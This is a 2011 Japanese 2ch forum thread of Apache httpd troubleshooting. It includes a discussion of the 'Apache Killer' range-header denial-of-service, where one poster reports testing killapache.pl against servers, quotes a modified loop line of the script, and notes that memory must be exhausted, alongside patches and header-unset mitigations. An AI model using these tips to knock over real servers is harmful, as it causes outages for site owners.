552 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/29(月) 19:46:34.21 ]: モジュールのページを見ると
そのモジュールが提供するディレクティブ一覧が載ってる。
そのディレクティブを使ってなければたいていいらない。
553 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/29(月) 21:15:45.17 ]: >550-552
大体そんな方針で良いみたいですね

ある程度最初からonにしてあるのは利便性のタメかな？
554 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/29(月) 23:02:41.02 ]: ある程度というより、configure時にsharedで有効にしたものは全部onになってるぞ
555 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/30(火) 11:10:26.12 ]: apacheを使い始めたばかりの者ですが、よく分からないことがあります。

apacheのドキュメントルート直下に/cgi-bin/という名前のフォルダを作ると、
Forbiddenとなってしまい、それ以下のファイルを参照することが出来なくなってしまいます。
直下に/cgi-bin/を配置するのではなく、/test/cgi-bin/というようにワンクッション置けば参照できるようになります。
これは正常な動作なのでしょうか？
また、これが正常な動作である場合、ドキュメントルート直下に/cgi-bin/というフォルダを置いても
Forbiddenにならないようにするにはどのように設定を変更すればよいのでしょうか？

教えていただきたいです。
556 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/30(火) 11:20:54.28 ]: >>555
っ ScriptAlias
557 名前：555 mailto:sage [2011/08/30(火) 12:28:42.47 ]: >>556
ありがとうございます。
つまり、ドキュメントルート直下に/cgi-bin/を作成すると、ScriptAliasの設定と競合する形になってしまうってことですかね？
それでScriptAliasの設定が優先されるので、自分で作成した/cgi-bin/はForbiddenになってしまうと。

あと、単純な質問になってしまいますが、そもそもScriptAliasの設定したディレクトリにcgiを置くメリットってなんなんでしょうか？
cgi自体をダウンロードされたり表示されないようにするためだと記してあるサイトが多いようですが、
ScriptAliasに置かなくてもcgiにアクセスしたら、結局はプログラムが実行された後の結果しか与えられないと考えていたのですが。
ScriptAliasで設定したディレクトリ以外に置かれたcgiというのは、その中身が簡単にみられてしまったりするのでしょうか？
558 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/30(火) 13:28:23.86 ]: >>557
> つまり、ドキュメントルート直下に/cgi-bin/を作成すると、ScriptAliasの設定と競合する形になってしまうってことですかね？
ScriptAlias の指定が優先されてドキュメントルートの方の /cgi-bin/ は参照されない。

> あと、単純な質問になってしまいますが、そもそもScriptAliasの設定したディレクトリにcgiを置くメリットってなんなんでしょうか？
一ヶ所に集めておくと管理しやすい。
あやしいプログラムをユーザに勝手に置かれるのを防ぐ。
559 名前：555 mailto:sage [2011/08/30(火) 14:09:15.85 ]: >>558
解説ありがとうございます。

>あやしいプログラムをユーザに勝手に置かれるのを防ぐ。

これはつまりセキュリティの事を考慮すると、cgiはScriptAliasで設定したディレクトリに置いた方がよいということですよね。

この質問とは別のことになりますが、例えばページの管理者だけが使用することを目的としたcgiを作成した場合、
ドキュメントルート下にhtaccessの設定でBasic認証を有効にしたディレクトリにそのcgiを置くよりも、
ScriptAliasで設定したディレクトリにそのcgiを置いた方がセキュリティ面では良いということになるのでしょうか？
560 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/30(火) 14:21:51.67 ]: >>559
管理しきれるならどこに置いてもいいんじゃね。

あと、自分と同じディレクトリにデータファイルを作るようなプログラムがあった場合に
ScriptAlias 以下ならそのファイルを覗かれることがない、っていう利点もあるにはある。
副次的な効果だけど。
そんなプログラム作る方が悪いんだけど。
561 名前：555 mailto:sage [2011/08/30(火) 14:34:43.13 ]: >>560

とりあえず、初心者なのでScriptAliasで設定したディレクトリにcgiを集めることにしてみます。

お答えくださってありがとうございました。
562 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/30(火) 14:46:50.14 ]: httpd.apache.org/docs/2.2/misc/security_tips.html#nsaliasedcgi
563 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/31(水) 10:38:02.43 ]: 2.2.20
564 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/31(水) 11:02:44.56 ]: 早速上げたった。
テストは面倒だからしてない(･∀･)y‐┛~~
565 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/31(水) 14:52:22.61 ]: 1.3系使ってる人はどうするの？
まだまだ沢山いると思うんだけど...
566 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/31(水) 15:02:26.97 ]: いいかげん 2.x に乗り換えれ。
567 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/31(水) 15:06:53.44 ]: 自分のサーバーなら2.2系使ってるんだけどね...
仕事先のだとなかなか...
568 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/31(水) 15:07:58.37 ]: 1.3系のパッチの予定はないのかな？
569 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/31(水) 17:54:52.56 ]: ないよ。
570 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/31(水) 23:31:26.50 ]: 赤帽バッチまだー
>>538
571 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/01(木) 03:47:35.52 ]: 2.2.20速いぞ
572 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/01(木) 10:45:44.80 ]: >>570
来たよ。
rhn.redhat.com/errata/RHSA-2011-1245.html
573 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/01(木) 11:18:40.39 ]: 2.0系のパッチの予定はないのかな？
574 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/01(木) 11:40:51.42 ]: 自分でバックポートしれ　そして配布しれ
575 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/01(木) 12:11:51.87 ]: >>573
RHEL4.xのパッチをパクればOK
576 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/01(木) 12:29:35.32 ]: 2.0.x は出す
1.3.x は出さないと言ってた気がする
577 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/01(木) 12:39:32.05 ]: 早い対応、めでたし。
今回の脆弱性で実際に攻撃を受けたってサイトはあるの？
578 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/01(木) 13:12:44.86 ]: >>577
2ch とか?
579 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/01(木) 13:15:49.58 ]: >>574 >>575
非公式な対応はいろいろあるけど、
公式に出ないのかな、と思って。
580 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/01(木) 14:41:38.01 ]: ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/httpd-2.2.3-53.el5_7.1.src.rpm
581 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/01(木) 14:43:16.08 ]: >>580
とつぜんどうしたの。
582 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/01(木) 14:48:35.43 ]: ｳﾌﾌ
583 名前：名無しさん＠お腹いっぱい。 [2011/09/01(木) 18:50:37.25 ]: Apache Killerの件で
落としてみて報告してくれと無茶ぶりされて、
必死こいて頑張っていますが、
killapache.pl　を使って、
1.3.xでは落ちません。
2.2.xでは落ちました。
変な話ですが、1.3.xで落とせた方はいらっしゃいますか？
584 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/01(木) 20:19:33.78 ]: つまり1.3最強という事ですね。
585 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/01(木) 20:26:28.53 ]: 1.3はinetdモード使えるから今でも重宝してる
586 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/01(木) 20:35:48.51 ]: >>585
なんでinetdモード使ってるの？
587 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/01(木) 20:38:22.72 ]: ちゃんとプロセス数増やしてメモリ潰さないと止まらないっしょ
588 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/01(木) 21:50:55.78 ]: >>586
TCP Wrapper が使いたいとか？
589 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/01(木) 22:15:07.02 ]: >>583
ここが参考になるかも
blog.tokumaru.org/2011/08/apache-killerapache-killer.html
590 名前：名無しさん＠お腹いっぱい。 [2011/09/01(木) 22:40:19.55 ]: 583です。
MaxClientsを下げて10にしましたが、ビクともしません。
そもそもkillapache.plの
28行目 for ($k=0;$k<1300;$k++) {
を
for ($k=5;$k<1300;$k++) {
としないと
206 Partial Content
が返りませんでした。200が返りました。
2.2.xでは、何もしなくても206が返りました。
再現方法が違うのでしょうか？
591 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/01(木) 22:45:57.52 ]: >>590
people.apache.org/~dirkx/CVE-2011-3192.txt
592 名前：名無しさん＠お腹いっぱい。 [2011/09/01(木) 23:09:15.40 ]: >>591
583です。

そんな今さら・・・

Apache 1.3 is NOT vulnerable.
えっ！？

UPDATE2までしか見ていませんでした。
ありがとうございました！
593 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/01(木) 23:40:13.17 ]: わかりました。apache_1.3.42 に戻します。
594 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/02(金) 01:22:26.29 ]: 1.3系試してないねぇ
ttp://www.jpcert.or.jp/at/2011/at110023.html
595 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/02(金) 08:36:48.74 ]: え？1.3系は大丈夫だったの？
596 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/03(土) 12:23:58.91 ]: huge.shit.com/test.php -> 200 OK
huge.shit.com/test.php?param=xxx -> 404 Not Found
<上記ドメインのIP>/test.php -> 200 OK
<上記ドメインのIP>/test.php?param=xxx -> 200 OK

Virtualhostへのアクセスで存在するファイルにGETパラメータを渡すと404になる。
こんな現象に悩まされてるんだけど、これなんで？誰か教えて！
597 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/03(土) 12:39:44.97 ]: ログ読んでみたら。
598 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/03(土) 12:45:11.61 ]: ログは File is not found が並んでるだけなんだよね。
ていうか、パラメータ渡すと not found になる設定ってあるのかな。
昨日まで正常だったのに、いきなりこの現象が発生してわけわからんのです。
599 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/03(土) 13:44:17.55 ]: 何も変更してないならrestartしてみたら？
600 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/03(土) 13:48:55.99 ]: restartはしたんすよ。変わらずです。
おれ以外にも管理者はいるから誰かが
何かを書き換えた可能性はなくはないんだよね。
?でパラメータ渡すと別ファイルとして認識されちゃうってことだよね多分これ。
601 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/03(土) 14:14:14.82 ]: 書き換えた人に聞いた方が早くない？
confの日付で実際更新されてるか分かるだろうし。
602 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/03(土) 14:21:53.08 ]: >>596

Rewrite使ってる？
Apache Killerの件で設定変えたとか。
603 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/03(土) 15:36:13.73 ]: >>602
Rewriteは、してないね。
killapache対策はしたけど、数日前なので、タイミングは合致しないなー。
604 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/03(土) 15:45:48.19 ]: POSTした場合はどうなりますか？
605 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/03(土) 16:34:37.48 ]: 普通設定いじる前にバックアップとらない？
diffすればいいんじゃない？
606 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/03(土) 16:57:16.34 ]: >> 601
誰が何を変更したのかがわかる状況ではないんだよね。confの更新日はkillapache対策の時だね。昨日じゃない。
ためしにRange周りの設定をオフってみたけど関係ないみたい。
>> 604
FirefoxのHackbarってアドオン使ってPOSTしてみた限りでは問題なかべおん。
てかさ、
/js/jquery.js
だとアクセスできて
/js/jqueyr.js?test
でNot Foundになるってどおゆうことなんだろう。んなことある？
607 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/03(土) 18:53:08.15 ]: >>606

違うブラウザではどんな？同じ動作？
608 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/03(土) 19:19:20.79 ]: >>606
うだうだ書いてるヒマあったら他の管理者どもに話を訊けよアホ
あと設定ファイルの変更履歴とれやボケ
609 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/03(土) 19:35:31.64 ]: まずは管理体制の見直しからだな。
610 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/03(土) 19:37:16.20 ]: これを機にIISに切り替えよう。
611 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/03(土) 22:37:24.77 ]: >>607
どのブラウザでも一緒だね。
IP直打ちとVirtualHostで動作が違うってのがポイントだと思ってずっと調べてるけど、未だ解決できず。
>>608
confに変更はない。他の管理者は連絡とれず。やーここの人なら「そりゃおめー原因はあれだよ」ってなるかなと
思ってさ。自力で調べつつ、わらにもすがる思いで聞いとります。
612 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/03(土) 23:28:57.17 ]: >>611
config晒せば。

何らかの意図があって設定を変更しているのなら
設定を戻せば良いって話でもない気がするけど。
613 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/03(土) 23:43:40.87 ]: >>611

>IP直打ちとVirtualHostで動作が違うってのがポイントだと思ってずっと調べてるけど、未だ解決できず。
そこじゃないかもしれんぞな。

/js/jqueyr.js?test
↑↑↑↑
尻尾つきで、POSTするとどない？エラー？
614 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/04(日) 00:07:46.90 ]: >>613
こんな結果です。
[尻尾あり]
xxx.example.com/js/jquery.js?test
POST /js/jquery.js?test HTTP/1.1
HTTP/1.1 404 Not Found
[尻尾なし]
xxx.example.com/js/jquery.js
POST /js/jquery.js HTTP/1.1
HTTP/1.1 200 OK
615 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/04(日) 00:42:20.85 ]: >>614

POSTとGET関係ないと。

VirtualHostとの時だけ変なら、
試しに、違うドメインを追加(VirtualHost)して、そっちでも変になりますか？

差し障り範囲(ドメインとか、IPとかXXXして)で、confを見せていただけると、何か分かるかもね。
apacheバージョンとか、組み込んでるモジュールとか
616 名前：名無しさん＠お腹いっぱい。 [2011/09/06(火) 07:41:07.60 ]: 遅ればせながらapache killer対策に取りかかっています
巨大なファイルを扱っていない限りrangeヘッダに非対応でもいいので

RequestHeader unset Range
RequestHeader unset Request-Range

二行追加でよろしいでしょうか？
617 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/06(火) 08:16:43.48 ]: バージョンチェックも入れました

<IfVersion < 2.2.20>
RequestHeader unset Range

RequestHeader unset Request-Range
</IfVersion>
618 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/06(火) 14:25:04.79 ]: 話の流れに割り込むような形になってしまい申し訳ありませんが、Apache初心者の質問をさせてください。

Apacheにおける環境変数QUERY_STRINGの呼び出しに関する質問です。

Apache上に置いてあるshtml内にGETメソッドのフォームを設置しています。
フォームのテキストボックス内に日本語で文字を入力してsubmitボタンを押し、
新しく表示されたshtml内でSSIを使用して、cgiで環境変数QUERY_STRINGをshtml内に表示しようとしています。

テキストボックスに何も入力しない場合や半角英数字のみを入力した場合は正しく習得され、
cgiによってshtml内に環境変数QUERY_STRINGのデータがしっかりと表示されるのですが、
テキストボックス内に日本語を入力した場合は、shtml内に環境変数QUERY_STRINGの中身が
何もない状態であるかのように表示されてしまいます。つまり、『?』以降が何も表示されないということです。
しかし、テキストボックス内に日本語を入力した場合でも、新しく表示されたshtmlのURLには入力した文字データが
GETメソッドとして正常に受け取られているように表示されています。

AN HTTPDで全く同じshtmlおよびcgiを使用した場合は、日本語を入力してもshtml内にその結果が正しく表示されるので、
Apache内の何かが原因であるのではないかなと考えているのですが、よく分かりません。

お分かりになる方おられましたら、どうかよろしくお願いします。
619 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/06(火) 15:35:20.59 ]: 謙譲語・・
620 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/06(火) 18:18:46.32 ]: それはわかっておりますｗ

shtmlがUTF-8じゃないんだろｗ
621 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/06(火) 21:31:32.29 ]: >>598
LogLevel debug を設定したらヒントが出るかもしれない。
622 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/06(火) 21:36:14.32 ]: 連投ですまん。
あと、>>596 を見て思うのは、
huge.shit.com/test.php?param=xxx のときは
"test.php?param=xxx" というファイルを探しに行ってるんじゃないかと・・・

まぁ、バーチャルホスト内の設定のどこかがおかしいんだろう。
あとは .htaccess が置いてあったりとか。
623 名前：618 mailto:sage [2011/09/07(水) 01:01:45.37 ]: >>620

おっしゃるとおり、shtmlはUTF-8ではなくShift_JISで作成したものです。
UTF-8のページにしたところ、日本語のデータを表示することができました。
ありがとうございました。

GETを受けるページがUTF-8でなければならないのは、Apacheの仕様なのですか？
Shift_JISでも表示できるように、設定で変更することなどは可能ですか？
AN HTTPDではshtmlがShift-JISで書かれていてもちゃんと表示されていたので、
Apacheだとなぜ表示されないのかよく分からないのですが・・・。
624 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/07(水) 11:43:32.18 ]: >>622

?が全角
625 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/07(水) 12:34:26.14 ]: まさかぁ。
626 名前：名無しさん＠お腹いっぱい。 [2011/09/12(月) 16:53:37.17 ]: >>596
その後どうよ。
627 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/13(火) 14:52:27.40 ]: 2.2.21とな
628 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/13(火) 16:36:44.83 ]: Apache Killerの余韻はこの辺か＞ 2.2.21

*) Fix a regression introduced by the CVE-2011-3192 byterange fix in 2.2.20.
PR 51748. [<lowprio20 gmail.com>]

*) core: Allow MaxRanges none|unlimited|default and set 'Accept-Ranges: none'
in the case Ranges are being ignored with MaxRanges none.
[Eric Covener]
629 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/20(火) 12:59:10.14 ]: こんにちは。質問させてください。

お名前.comでドメイン取得
さくらvpsを契約し

var/www/html/rails_app/public
をドキュメントとして
example.com にアクセスしたとき
Railsのアプリが走るようにしています

そして
usr/share/phpMyAdmin
にphpmyadminを入れています

phpmyadmin.example.com
にアクセスしたときだけ
phpmyadminが表示されるようにするには
どのような設定をすればいいでしょうか？
630 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/20(火) 13:16:50.42 ]: hibari.2ch.net/test/read.cgi/linux/1314715110/407
の人?
631 名前：名無しさん＠お腹いっぱい。 [2011/09/23(金) 16:36:44.12 ]: ソースからRPMを作ろうとしています
ソース同梱のspecファイル中に
# symlinks for /etc/httpd
とあって、logやrunやmodulesのシンボリックリンクを作ってるんですが
/etc/httpd配下にそんなシンボリックリンクいらなくないですか？
どういう意味があるんでしょうか
632 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/23(金) 18:05:23.72 ]: >>631
いらないと思うなら作る必要はない。
歴史的に /etc 配下に設定ファイルを集めているだけ
/etc の配下に httpd があれば、設定ファイルを探しやすいってだけだ

/usr/local/httpd とかに全部入れる人だっているんだし
自分だけが触るなら別に何でも良いじゃないの？

他人が触るなら /etc/httpd があった方が、親切
633 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/26(月) 10:23:38.12 ]: redhat 系では ServerRoot が /etc/httpd になっているので、
symlink がないとモジュールの場所はじめありとあらゆるものが
相対パスで書けなくなるんだよ。
634 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/26(月) 17:31:11.27 ]: そういう気遣いもドキュメントとか無いサーバいじるときは
$ ps -ef|egrep 'http|apache'
$ /usr/sbin/apache2 -V

って感じでたどっていくね><
635 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/26(月) 17:41:29.86 ]: 話ずれてきたな。
636 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/29(木) 21:04:06.24 ]: httpd.confでアクセス制限をやろうとしています。
「localhost:8080」からのみアクセス許可したいのですができません。

Order allow,deny
Allow from localhost:8080

とやるとエラーが出てApacheが起動しなくなります。
どなたかご教授を・・。
637 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/29(木) 21:14:13.21 ]: 添付ドキュメント読んでこい
638 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/29(木) 21:15:50.25 ]: どこの馬の骨かわからん奴に教授などする気はない。
639 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/29(木) 21:45:40.32 ]: お父さんキツイっす
640 名前：636 mailto:sage [2011/09/29(木) 21:56:31.63 ]: 該当しそうな箇所を読んだけど載ってませんでした。
ポートを指定した場合のケースはググっても見つからないのよ。。
641 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/29(木) 22:39:15.28 ]: >>640
そのポートで Listen してるんよね。
そしたら、localhost だけAllow にして...
後は、分かるよな。
642 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/29(木) 22:46:21.35 ]: >>641
それだと403エラーとなってしまいます。

Forbidden

You don't have permission to access / on this server.

<Directory "C:/xampp/Apache/htdocs">
Allow from All
</Directory>

にしたり、Listenを80にすれば普通にアクセスできるのですが。
643 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/29(木) 23:05:06.03 ]: やりたいことを正しく表現できないお馬鹿さんであり
充実したドキュメントがあっても理解できないお馬鹿さんでもあるという
そんなかんじ？
644 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/29(木) 23:29:33.45 ]: 中学校で習うだろ。
645 名前：636 mailto:sage [2011/09/29(木) 23:32:43.56 ]: >>642
>Listenを80にすれば普通にアクセスできる
これは間違いでした。以下の設定で「localhost/」にアクセスしても
403エラーとなります。

Listen 80
ServerName localhost:80
<Directory />
Options FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
</Directory>
<Directory "C:/xampp/Apache/htdocs">
Options Indexes FollowSymLinks
AllowOverride None
Order allow,deny
Allow from localhost
</Directory>

Allow from localhostの部分をAllow from Allとすると「It works!」と出て接続できます。
ポート関係なしにlocalhostからのみアクセス許可することもできません。
646 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/29(木) 23:42:45.12 ]: >>645

ちょっと、落ち着け。

403になるなら、
DocumentRoot はどこかね。
647 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/29(木) 23:55:10.08 ]: >>646
済みません、やはり最初ので正しいです。
>>645キャッシュが原因で403エラーとなっていたようで、クイック起動バーから
新しいウィンドウを開くと「It works!」と出て接続できます。
Allow from localhostで「localhost/」はOKということです。

ポートを8080にして「localhost:8080/」でアクセスすると403エラーとなります。
全ブラウザを閉じてからアクセスして確認しました。

Listen 8080
ServerName localhost:8080
<Directory />
Options FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
</Directory>
<Directory "C:/xampp/Apache/htdocs">
Options Indexes FollowSymLinks
AllowOverride None
Order allow,deny
Allow from localhost
</Directory>

DocumentRoot "C:/xampp/Apache/htdocs"
648 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/30(金) 00:10:00.39 ]: >>647
8080 でアクセスするとき、error_log に何て出てる？
649 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/30(金) 00:31:32.37 ]: >>648

たくさんあってどれを挙げればいいかわからないんですがこんな感じのがありました。

[Fri Sep 30 00:12:17 2011] [notice] Child 7976: Starting thread to listen on port 8080.
[Fri Sep 30 00:12:38 2011] [error] [client 127.0.0.1] client denied by server configuration: C:/xampp/Apache/htdocs/
[Fri Sep 30 00:13:50 2011] [notice] Parent: Received restart signal -- Restarting the server.
[Fri Sep 30 00:13:50 2011] [notice] Child 7976: Exit event signaled. Child process is ending.
httpd.exe: Could not reliably determine the server's fully qualified domain name, using 192.168.1.2 for ServerName

それとWindowsファイアウォールを今調べているところです。
650 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/30(金) 00:41:01.39 ]: エラーログを削除して真っさらにしてやってみました。

[Fri Sep 30 00:38:36 2011] [notice] Parent: Received restart signal -- Restarting the server.
[Fri Sep 30 00:38:36 2011] [notice] Child 6636: Exit event signaled. Child process is ending.
[Fri Sep 30 00:38:36 2011] [notice] Apache/2.2.21 (Win32) configured -- resuming normal operations
[Fri Sep 30 00:38:36 2011] [notice] Server built: Sep 9 2011 10:26:10
[Fri Sep 30 00:38:36 2011] [notice] Parent: Created child process 4464
[Fri Sep 30 00:38:37 2011] [notice] Child 4464: Child process is running
[Fri Sep 30 00:38:37 2011] [notice] Child 4464: Acquired the start mutex.
[Fri Sep 30 00:38:37 2011] [notice] Child 6636: Released the start mutex
[Fri Sep 30 00:38:37 2011] [notice] Child 4464: Starting 64 worker threads.
[Fri Sep 30 00:38:37 2011] [notice] Child 4464: Starting thread to listen on port 8080.
[Fri Sep 30 00:38:45 2011] [notice] Child 6636: All worker threads have exited.
[Fri Sep 30 00:38:45 2011] [notice] Child 6636: Child process is exiting
[Fri Sep 30 00:39:02 2011] [error] [client 127.0.0.1] client denied by server configuration: C:/xampp/Apache/htdocs/
651 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/30(金) 00:45:16.71 ]: >>650
そこに 403 の原因が書いてるではないか。
652 名前：636 mailto:sage [2011/09/30(金) 01:11:25.26 ]: 今日はもう無理なので寝ます。
いろいろググってみたので明日やってみます。
ヒントを下さってありがとうございました。
653 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/30(金) 02:24:50.28 ]: unixちゃうやん！Windowsやん！板違いやん！

Apache統合スレ 11 (HTTPServer以外も含む)
hibari.2ch.net/test/read.cgi/mysv/1286137109/
654 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/30(金) 02:33:04.31 ]: >>636
8080はdst portだろ。
655 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/30(金) 09:40:34.35 ]: これはひどい。
656 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/09/30(金) 10:35:16.09 ]: あるのか知らんが初心者スレに書いたほうがよかったな
657 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/01(土) 11:17:49.27 ]: 接続数制限とかだと最近じゃmod_vlimitというやつが結構良いが使ってる人いる？
ファイル単位で接続数制限かけたいと思ってる
658 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/09(日) 17:03:05.04 ]: >>657
しらね。
それ系のは、mod_statusのスコアボード見て各プロセスやスレッドが
その瞬間に処理してるURLの中から単純にマッチするものを
カウントしてるだけだから、動作的にはほとんど問題ないかと。

注意すべき点としては、MaxClientsみたいな同時アクセス数の数値を
あまり大きくしている場合は、カウントしなければならない対象も
かなりの数になるんで、オーバーヘッドが高くなる（かも）ってことぐらいかな？

関係ないが、今度はまたmod_proxyにセキュリティホールかｗ
659 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/11(火) 21:02:51.77 ]: とりあえずpatch当てた…
660 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/16(日) 14:13:43.19 ]: >>658
ファイル単位で同時接続数見るのはスコアボードじゃできないよ
661 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/18(火) 07:36:25.84 ]: nginxスレってないの？
662 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/18(火) 07:45:13.62 ]: ないよ。
663 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/18(火) 16:28:25.06 ]: >>661
立てろ
664 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/19(水) 06:50:34.73 ]: いやん
665 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/19(水) 11:39:18.13 ]: Apacheも最初は読み方が分からなかったが
nginxも相当ぶっとんでるな。
666 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/19(水) 12:37:28.55 ]: >>665
「にんじんx」?
667 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/19(水) 13:10:55.14 ]: >>666
惜しい!
668 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/19(水) 13:58:21.86 ]: Apacheは普通の英単語じゃん。
669 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/21(金) 11:18:08.93 ]: >>660
あれ？そうだっけ？
Extend何とかの設定入れたら取れたと思ったが… 記憶違いかな。
ってか、スコアボードで取れないとしたら他にどんな実装があるっけ？
モジュール自前で共有メモリに書き出して管理するぐらいだろうか。
670 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/22(土) 11:04:10.65 ]: Connection closed by foreign host.
telnetして数秒たつとこうなるんだけど
これ無効にしたり、時間伸ばしたりできないの？
教えてください
671 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/22(土) 11:33:46.52 ]: ちゃんと説明できないバカは一昨日来ればいいと思うの
672 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/22(土) 11:43:47.08 ]: 教えてください
apacheにtelnetし接続して8秒ほどたつと
Connection closed by foreign host.
と出ます教えてください
673 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/22(土) 11:48:15.88 ]: タイムアウト値を変更したいのかなぁ・・・
674 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/22(土) 13:41:49.24 ]: >>670
なんでそんなことしたいの。
675 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/22(土) 14:09:58.39 ]: デフォルト設定のままインターネットに公開はキツいからなぁ
パフォーマンスチューニング系の話題は良い感じに纏めてる先人が多数いらっしゃるから

ググれカス
676 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/22(土) 16:15:19.35 ]: >>669
スコアボードにr->filenameは保存されない。
なので、ファイル単位で同時接続数調べようと思ったら子プロセス同士でプロセス間通信しないとだめ。
677 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/10/22(土) 16:17:07.10 ]: そういう意味では>>657は良くできてる
